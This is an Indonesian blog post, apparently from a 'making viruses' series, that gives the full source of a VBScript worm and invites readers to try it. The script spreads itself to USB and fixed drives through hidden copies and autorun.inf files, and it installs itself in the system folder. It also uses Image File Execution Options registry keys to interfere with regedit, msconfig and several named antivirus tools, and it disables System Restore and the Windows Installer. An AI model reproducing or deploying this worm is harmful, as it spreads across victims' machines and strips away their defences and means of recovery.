Ini virus level 2 dari artikel sebelimnya yang berjudul Making Virus MeLT . bagi yang masih penasaran pingin coba silahkan pelajari virus berikut ini. selamat mencoba, kerusakan ditanggung sendiri...!
-------------------------script begin--------------------------
On error resume next
Dim dini,jatiya,i,loph,you,mf,isi,tf,vhck3d,nt,check,sd
'Siapkan isi autorun atau bahasa kerennya make the autorun
Isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe vhck3d.vbs"
Set you = createobject("scripting.filesystemobject")
Set mf = you.getfile(wscript.scriptfullname)
Dim text,size
Size = mf.size
Check = mf.drive.drivetype
Set text = mf.openastextstream(1,-2)
Do while not text.atendofstream
Dini = dini & text.readline
Dini = dini & vbcrlf
Loop
Do
'Buat file induk bahasa coolnya prepare the mother
Set i = you.getspecialfolder(0)
Set jatiya = you.getspecialfolder(1)
Set tf = you.getfile(jatiya & "\hck3d.vbs")
Tf.attributes = 32
Set tf = you.createtextfile(jatiya & "\hck3d.vbs",2,true)
Tf.write dini
Tf.close
Set tf = you.getfile(jatiya & "\hck3d.vbs")
Tf.attributes = 39
'Sebar ke removable disc ditambahkan dengan autorun.inf ini saya mah gak tau bahasa inggrisnya
For each loph in you.drives
If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <> "a:" then
Set tf=you.getfile(loph.path &"\vhck3d.sys.vbs")
Tf.attributes =32
Set tf=you.createtextfile(loph.path &"\vhck3d.vbs",2,true)
Tf.write dini
Tf.close
Set tf=you.getfile(loph.path &"\vhck3d.vbs")
Tf.attributes = 39
Set tf =you.getfile(loph.path &"\autorun.inf")
Tf.attributes = 32
Set tf=you.createtextfile(loph.path &"\autorun.inf",2,true)
Tf.write isi
Tf.close
Set tf = you.getfile(loph.path &"\autorun.inf")
Tf.attributes=39
End if
Next
'Manipulasi registry
Set vhck3d = createobject("wscript.shell")
'Banyak yang dirubah..liat ndiri deh aaah
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\msconfig.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedit.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedt32.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\registryeditor.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\setup.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avscan.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avcenter.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ashavast.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ansav.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremoval.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremover.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\pcmav-cln.exe.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\winlogon\legalnoticecaption", "my loph dini"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\limitsystemrestorecheckpointing", "1", "reg_dword"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\disablemsi", "1", "reg_dword"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disablesr", "1", "reg_dword"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disableconfig", "1", "reg_dword"
If check <> 1 then
Wscript.sleep 200000
End if
Loop while check <> 1
Set sd = createobject("wscript.shell")
Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname
-----------------------end script-----------------------------
0 komentar:
Posting Komentar